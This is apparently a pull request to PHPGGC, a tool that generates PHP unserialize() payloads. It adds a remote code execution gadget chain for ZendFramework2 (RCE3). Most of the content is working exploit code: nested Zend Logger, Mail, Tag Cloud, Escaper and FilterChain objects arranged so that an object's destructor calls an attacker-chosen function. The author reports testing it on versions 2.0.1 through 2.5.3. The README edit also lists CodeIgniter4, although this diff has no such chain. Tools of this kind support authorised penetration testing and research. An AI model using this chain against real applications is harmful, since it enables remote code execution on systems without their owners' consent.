### PR TITLE
Add ZendFramework2 RCE chain

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 *PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically*.
 When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of [frohoff's ysoserial](https://github.com/frohoff/ysoserial), but for PHP.
-Currently, the tool supports: Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Slim, SwiftMailer, Symfony, Yii and ZendFramework.
+Currently, the tool supports: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Slim, SwiftMailer, Symfony, Yii and ZendFramework.
 
 
 ## Requirements
@@ -48,6 +48,7 @@ Symfony/RCE3          2.6 <= 2.8.32         rce              __destruct     *
 Yii/RCE1              1.1.20                rce              __wakeup       *    
 ZendFramework/RCE1    ? <= 1.12.20          rce              __destruct     *    
 ZendFramework/RCE2    1.11.12 <= 1.12.20    rce              __toString     *    
+ZendFramework/RCE3    2.0.1 <= ?            rce              __destruct
 ```
 
 Every gadget chain has:

--- a/gadgetchains/ZendFramework/RCE/3/chain.php
+++ b/gadgetchains/ZendFramework/RCE/3/chain.php
@@ -1,0 +1,18 @@
+<?php
+
+namespace GadgetChain\ZendFramework;
+
+class RCE3 extends \PHPGGC\GadgetChain\RCE
+{
+    public static $version = '2.0.1 <= ?';
+    public static $vector = '__destruct';
+    public static $author = 'eboda';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters["function"];
+        $parameter = $parameters["parameter"];
+
+        return new \Zend\Log\Logger($function, $parameter);
+    }
+}

--- a/gadgetchains/ZendFramework/RCE/3/gadgets.php
+++ b/gadgetchains/ZendFramework/RCE/3/gadgets.php
@@ -1,0 +1,96 @@
+<?php
+namespace Zend\Log    {
+    class Logger {
+        protected $writers;
+
+        function __construct($function, $param) {
+            $this->writers = array(
+                new \Zend\Log\Writer\Mail($function, $param)
+            );
+        }
+    }
+}
+
+namespace Zend\Log\Writer {
+    class Mail {
+        protected $eventsToMail;
+        protected $subjectPrependText;
+        protected $numEntriesPerPriority;
+
+        function __construct($function, $param) {
+            $this->eventsToMail = array(0);
+            $this->subjectPrependText = "";
+            $this->numEntriesPerPriority = array(
+                0 => new \Zend\Tag\Cloud($function, $param)
+            );
+        }
+    }
+}
+
+namespace Zend\Tag  {
+    class Cloud {
+        protected $tags;
+        protected $tagDecorator;
+
+        function __construct($function, $param) {
+            $this->tags = array("");
+            $this->tagDecorator = new \Zend\Tag\Cloud\Decorator\HtmlCloud($function, $param);
+        }
+    }
+}
+
+namespace Zend\Tag\Cloud\Decorator {
+    class HtmlCloud {
+        protected $separator;
+        protected $escaper;
+        protected $htmlTags;
+
+        function __construct($function, $param) {
+            $this->separator = "";
+            $this->htmlTags = array(
+                "h" => array(
+                    "a" => "!"
+                )
+            );
+            $this->escaper = new \Zend\Escaper\Escaper($function, $param);
+        }
+    }
+}
+
+namespace Zend\Escaper {
+    class Escaper {
+        protected $htmlAttrMatcher;
+
+        function __construct($function, $param) {
+            $this->htmlAttrMatcher = array(
+                new \Zend\Filter\FilterChain($function, $param),
+                "filter"
+            );
+        }
+    }
+}
+
+namespace Zend\Filter {
+    class FilterChain {
+        protected $filters;
+
+        function __construct($function, $param) {
+            $this->filters = new \SplFixedArray(2);
+            $this->filters[0] = array(
+                new \Zend\Json\Expr($param),
+                "__toString"
+            );
+            $this->filters[1] = $function;
+        }
+    }
+}
+
+namespace Zend\Json {
+    class Expr {
+        protected $expression;
+
+        function __construct($param) {
+            $this->expression = $param;
+        }
+    }
+}


### PR DESCRIPTION
This adds a new RCE chain for ZendFramework2. 
I have tested it on version 2.0.1 and on the latest version 2.5.3, so I'm quite certain it works on any version after (and including) 2.0.1.

It throws an exception, but the command is executed before that
